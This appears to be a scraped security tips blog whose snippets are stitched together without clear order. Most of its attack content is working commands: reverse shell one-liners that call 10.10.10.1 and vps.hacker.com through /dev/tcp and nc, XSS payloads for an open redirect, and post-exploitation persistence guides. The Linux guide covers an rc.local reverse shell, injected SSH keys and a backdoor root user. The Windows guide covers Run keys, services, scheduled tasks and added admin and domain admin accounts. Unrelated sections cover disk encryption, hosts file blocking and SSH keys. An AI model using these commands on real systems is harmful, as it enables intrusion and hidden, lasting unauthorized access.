|
1 |
/bin/sh >/dev/tcp/10.10.10.1/4444 2>&1 0>&1 |
|
1 |
while [ 1 ];do /bin/sh >/dev/tcp/10.10.10.1/4444 2>&1 0>&1;sleep 10;done |
|
1 |
nc -lvp 4444 |
SCTP listener
|
1 |
ncat --sctp -lvp 4444 |
TLS listener
|
1 |
ncat --ssl -lvp 4444 |
Assuming we have an open redirection through the following URL:
|
1 |
http://example.com/login?next=http://google.com |
|
1 |
http://example.com/login?next=data:text/html,<script>alert(1)</script> |
|
1 |
http://example.com/login?next=javascript:alert(1) |
To completely disable IPv6:
|
1 |
echo 'net.ipv6.conf.all.disable_ipv6=1' >> /etc/sysctl.conf |
Then, reload kernel config:
|
1 |
sysctl --system |
Admitting the encrypted partition is /dev/sda5, add the new password with the following command:
|
1 |
sudo cryptsetup -y luksAddKey /dev/sda5 |
Then, delete the old password with:
|
1 |
sudo cryptsetup luksRemoveKey /dev/sda5 |
In this article we will describe some post-exploitation techniques allowing us to maintain our access to a Linux box.
A reverse shell is neither discrete nor elegant, however it allow for quick backdoor access to the box.
Moreover, it does not require the machine to be visible on Internet, which can be useful if it is behind a NAT or a firewall.
Launch a connection to the attack server from our compromised machine:
|
1 |
root@compromised$ /bin/sh -c "while [ 1 ];do rm /tmp/f;mkfifo /tmp/f;/bin/bash < /tmp/f 2>&1 |nc vps.hacker.com 8080 > /tmp/f;sleep 10;done" |
This one-liner will try to open a shell to vps.hacker.com:8080 every 10 seconds.
We need a listener on the attacking server:
|
1 |
root@vps.hacker.com$ nc -lvp 8080 |
After some time, the shell is executed !
|
1 2 3 4 5 |
root@vps.hacker.com$ nc -lvp 8080 listening on [any] 8080 ... connect to [10.0.0.1] from root@compromised [10.0.0.2] 24021 id uid=0(root) gid=0(root) groups=0(root) |
We can then put the reverse shell one-liner in rc.local or bashrc for cross-reboot persistence.
|
1 |
root@compromised$ echo '(/bin/bash -c "while [ 1 ];do rm /tmp/ncfifo;mkfifo /tmp/ncfifo;/bin/bash < /tmp/ncfifo 2>&1 |nc vps.hacker.com 8080 > /tmp/ncfifo;sleep 10;done")&' >> /etc/rc.local |
If a SSH service is enabled on the compromised host, a simple solution could be to add our public key to the authorized_keys file . We can then connect directly through SSH.
First, generate a SSH keypair on our attacking server:
|
1 2 3 |
root@vps.hacker.com$ ssh-keygen root@vps.hacker.com$ echo .ssh/id_rsa.pub ssh-rsa AAAAB3N[...]Zf |
After which we copy the public key to the compromised host:
|
1 |
root@compromised$ echo 'ssh-rsa AAAAB3N[...]Zf' >> .ssh/authorized_keys |
We can log in anytime with:
|
1 |
ssh root@compromised |
Another solution could be to add a user. We can then use this user account to log in through SSH, FTP or any system service using local accounts on the machine.
|
1 |
root@compromised$ useradd admin --password $(echo lemmein|mkpasswd -s) --groups root,sudo |
This adds an “admin” user with password “lemmein”.
USB thumbdrives often store confidential information. However, it is very easy to loose. Encrypt a USB drive helps protecting your data with a password.
Here is how to encrypt a USB drive with cryptsetup:
First, install the cryptsetup package:
|
1 |
sudo apt-get install cryptsetup |
Then, ensure the USB drive is not mounted (replace /dev/sdb1 with the USB drive partition):
|
1 |
sudo umount /dev/sdb1 |
Now, let’s create an encrypted filesystem on the partition (choose a strong password):
|
1 |
cryptsetup luksFormat /dev/sdb1 |
Then, mount the filesystem and format it as FAT:
|
1 2 |
cryptsetup luksOpen /dev/sdb1 usb mkfs.fat /dev/mapper/usb |
|
1 2 |
cryptsetup luksOpen /dev/sdb1 usb mkfs.fat /dev/mapper/usb |
Then, unmount the device:
|
1 |
cryptsetup luksClose usb |
Next time the USB drive is inserted, a password will be prompted.
In this post, we will describe some persistence techniques on Windows boxes.
Some registry keys such as Run allow to define programs to start after a reboot.
There are two instances of the Run registry key:
The first instance only requires privileges of the current user, however the second one can only be set by users with administration privileges.
Let’s launch C:\Windows\agent.exe on each session start:
|
1 |
reg add HKCU\software\microsoft\windows\currentversion\run /v agent /d C:\Windows\agent.exe /f |
Services are programs started on each boot. They are started by default with maximum privileges (SYSTEM).
Example:
|
1 |
sc create secretservice binPath= "C:\Windows\agent.exe" start= auto |
Scheduled tasks are executed periodically.
|
1 |
schtasks /create /tn yetanothertask /tr C:\Windows\agent.exe /sc onstart |
Adding a Windows user is a simple yet efficient solution to maintain our access. Adding a user requires administration privileges.
Adding a new local administrator “admin” with password “s3crEt”.
|
1 2 |
net user admin s3crEt /add net localgroup Administrators admin /add |
The local adminstrators group’s name can change with the system’s language (e.g “Administrateurs” in French).
If we have domain administration privileges, we can add another domain administrator:
|
1 2 |
net user admin s3crEt /add /domain net group "Domain Admins" admin /add /domain |
Social networks are omnipresent on the Internet. Most websites include social widgets, allowing to “like” or “bookmark” pages. However, these widget can help track your browser’s IP, user agent, history, gelocation etc. This happens even if you are not connected and don’t own an account on the social network.
To avoid this, we can edit the hosts file, which contains IP address / hostname associations.
On Windows, it is located at C:\Windows\System32\drivers\etc\hosts, on Linux it is at /etc/hosts and on Mac it is there: /private/etc/hosts.
Then, it is sufficient to add this line at the end of the file and save (you need administrator privileges to save).
|
1 |
127.0.0.1 facebook.com instagram.com |
Adapt the domain name list with any domain you would like to block.
Here is an example hosts file blocking facebook.com.
|
1 2 3 4 5 6 7 8 9 10 |
127.0.0.1 localhost # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 127.0.0.1 facebook.com |
Now, you should see Facebook widgets disappear like by magic on every page you visit !
First, generate a SSH RSA keypair:
|
1 |
ssh-keygen |
The public key should be copied on the remote server you want to access though SSH:
|
1 |
ssh-copy-id user@myserver.com |
The private key should be on every machine you want to connect from (usually, only your own).
Now, simply log in with ssh user@myserver.com
Welcome on chapeaugris.fr !
Here you will find some tips and tricks I gather here for later reference by myself or anyone this may help !
